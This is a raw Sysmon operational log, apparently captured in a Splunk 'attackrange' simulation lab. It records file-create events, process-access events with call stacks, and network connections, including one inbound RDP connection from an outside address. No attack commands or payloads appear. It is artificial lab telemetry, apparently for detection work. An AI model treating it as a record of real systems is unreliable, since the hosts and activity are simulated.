08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.203{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E4E1FDE76EFFC5497FC776892FF49F,SHA256=4FE4700143654CE2C4406FD73EBAE549AA16C0771F34129EBB86735E44B5A1AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:37.667{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BD12DB9BF3FEFE28F7887390124E543,SHA256=AA21787F7DDB29E209636E265BBB5CA0CFBFD3825158D87235E0F12E4BB76488,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:37.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A420A6E0B2449355CF97CB261C522906,SHA256=D3958CADA7BD9C2B5EFD4305E3501B2689779AF26D0B96D3F6FFA70816BD94B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:38.699{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB30F544DEC6EE53EE2E6B48DB140802,SHA256=D139519B73E931989502A5E15D4D919FA5E53A5438DBE2A85B82364EA8F22E02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:38.701{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=49347CFA0E7CE22F6019DEC53590445C,SHA256=6F99B8D304255C8F5E35FF6FC53A67C78E19491725E27714157A13C26A6B1A00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:38.248{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE2FB4A16BDCEE5DFB952FE8A3135237,SHA256=F5B85B6BA6B7416B1B27E81A63F3A523609A0A55AE56D10450790B6BD8024DDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:39.730{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FF523D8C5052C0845762F9A8E773E5B,SHA256=4141DFFCE918821249E6AE8A96BC956829A6103C6AEE724E2D1541DCE25D676D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.403{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.403{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FBDBB5A315464A3ABF62E645BCF7B6A,SHA256=F0C3F7AD80C45DEFFBDC35395AA2FE7ECAE009F2E7702A0BBF59C8BCF0F240B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:40.745{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5513665250F908AE0457BE545DFFB6,SHA256=A5AC413E4CDC7F4AE16C3972C9FD429DE95CA5CD26A2A3523A4C64CF50AF3F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:40.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=152E18FFE660555AE6C13AF2272BA9D9,SHA256=2F939A948B6C7445684727DA729C2E14F5E1C05533697EE4B63B128FD22447BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:38.207{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57487-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:41.745{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BFEC0458842D96C2014F9A9451F1122,SHA256=C523B6280B67FDDD0FF4A89F88425E7039020446401782ABF91F8C04ECAFA4E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:33.658{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61999-false10.0.1.12-8000- 23542300x80000000000000001055369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:41.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=688B5F48886C8FB175050AB42A5C79E0,SHA256=03822314F80A5F16AF2989C3C36709FA012886D37DA7D01C2F87959DBAD96D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:42.761{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5155C27AC5F481D81019646A35D35C2C,SHA256=C57A8E56C5A6F69782A5B48CEB989B589D51AB04CA20C54D59D55880211DCE46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:42.301{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=538BCD068DA988DA4D6BE08A3D612254,SHA256=A632E5C63A5C498D600D70B268715CCB22B626FD694C6BA931A43599824321CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:42.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1AAB564721D6EF7704F7D48944815EE,SHA256=023378C4B95A7858F932DFC20D45699167CF88526A5E8C26C02C3A19441CB360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:42.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=311F16367C1C5724D3CF5C3A003115A1,SHA256=D476E30BACDE6F4F7ECA4A0692D66614AE959520E2E36602DFA824FA71E2C67C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:40.871{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-1131-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:43.761{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF12E2D45E4F29B461046F5248F469E,SHA256=2C16AA7E697FE8C45276E4986E70E40954E7864A2123A1883ECC77DFCDD15E17,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:35.160{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57488-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:43.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35DC6ACD5A8667913B181E40ECC5D0F5,SHA256=5F8F5366B81CD333C7A304C8FE5ED7667CD85042DDECCE04163E46F40B431D4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:41.787{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57488-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:44.777{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62F3DD0213393E12C223A76F8F81C263,SHA256=95A1F55E2A29090443C8A3BCBFBC4B38FCADF6CFD50D2FC9C0963B725139AA8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:44.362{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91BC869F1D7DB7F1BFEC9D0BE61B9188,SHA256=BCD3288F726B254569332199132126358A562BFC9953C442EA4D9488D1187CFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:45.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D807F02606795221C8E4AA928F438D,SHA256=B792D3CB5E11320F71D2E7734A4AC228D8EC21D9AC5C63C5D61103B9FF0D4D0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:45.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99BFA9F141A5E0893FDBE52B7C817102,SHA256=11F6949955B663F43CBFFDCCBC24F00C12C907E4DAD4FDCE49ACCBFD53DAB7A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:43.348{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57489-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:46.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B4D872DF7B5129F4721E101BE248E8,SHA256=D75341314E550EAE45868131419C59D8B02CC951AFC8653036952F603AC56D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:46.418{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413AD088F3FFB8C955E262FFA624EB92,SHA256=BCA6A3B5D1C9F4766033ED7ED14D1031AA354217458ED67001B89E8EB6A30347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:47.808{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12F0C6A2ED4BAAC567C30916DC2537C3,SHA256=33BB6542A3197E2D90B6ECA03C93DC93E88E9112963552D00A983205EE0B7746,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.590{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62000-false10.0.1.12-8000- 23542300x80000000000000001055377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:47.449{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5351EF972834255DE87EA2DC60212392,SHA256=B3887D34D4433FF49E9F6C73E5D677E1AA6EC6584369506228A0BB93D6D7D36C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:48.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BD2298B06D6BD0C511F50FAB31A2201,SHA256=44A273FFEA82AA8EDE7FDE75CC78EEE85F0F1AB43BB9F3E935C6531B949CAFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:48.482{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72CB2CA7831FB0E076ED43335D7CD693,SHA256=84BC04261E68DB705C7F6BD2A3DB1041238907A4D084EC5B27597AB39686E19A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:49.870{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CDCBFDEBED4EB9DDE016058835341FB,SHA256=D2FBA9A859972C0D3805FA6FB654226F0F0E511678AA72D8739C49D0E57497E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:49.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087B716734AD8954A2180403196E6840,SHA256=D24EE5D74AE993B06EE8C5043FD29A7F79EE255FCC4CFD5E5E28425B23781079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:50.870{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA956E8DF6D1EC5997F71FA435A0F6DD,SHA256=800E8A34A86C161F929A35A64F8EC9CFDA07A4AA308537559E421DCBD625A87C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.915{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8CE-60EB-0A7E-00000000CF01}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.915{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.915{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.900{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 